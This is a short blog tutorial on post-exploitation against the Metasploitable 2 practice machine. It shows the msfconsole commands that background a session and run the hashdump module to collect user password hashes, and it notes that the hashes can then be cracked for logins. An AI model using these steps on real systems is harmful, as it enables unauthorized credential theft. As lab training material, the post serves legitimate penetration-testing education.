Thursday, October 13, 2016

Pwning Metasploitable 2: Post Exploitation - Dumping Password Hashes

From our previous exploitation articles we have successfully opened up sessions with our target machines. With open sessions you can do whatever you want on the target machine with the right tools. 

Ill have to admit- we have been skipping a few details during exploitation. While using the exploits, we can also set payloads. Think of payloads as an extra set of tools that you go in with that will help you do more stuff. We will show you how to use payloads in later articles.

Post exploitation is the next step after breaking into the target machine. Lets look at a post exploitation example where we will dump all the password hashes of users on the target system. 

Get an open session 

Follow any of our previous exploitation articles to help you get an open session with the target machine. 

Post exploitation 

Hit ctrl+Z to put the session into background. Enter Y when prompted. 

With this command, the session is still open however it is put on the background so as to allow you to use msfconsole. 

You can have multiple open sessions in the background. 

Check your sessions using the command: sessions

Enter the command: use post/linux/gather/hashdump
Enter the command: show options

This command selects the hashdump script. Metasploit stores all its post exploitation scripts in the "post" folder. We will go through other scripts in later articles. 

Normally we set the RHOST on exploits to give them a target. However on post exploitation scripts in metasploit we give it a session. 

Enter the command: set SESSION 1

The "1" in the command simple corresponds to the 'session 'id' you want the script to run on. You can view your sessions by the "sessions" command shown above. 

...and exploit. 

What you see on your screen are passwords... in hash format. Hashed passwords are then cracked using password cracking techniques or tools to retrieve plain text passwords which we can then use on login fields.  

-Jayesh Kerai (@secjay)

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.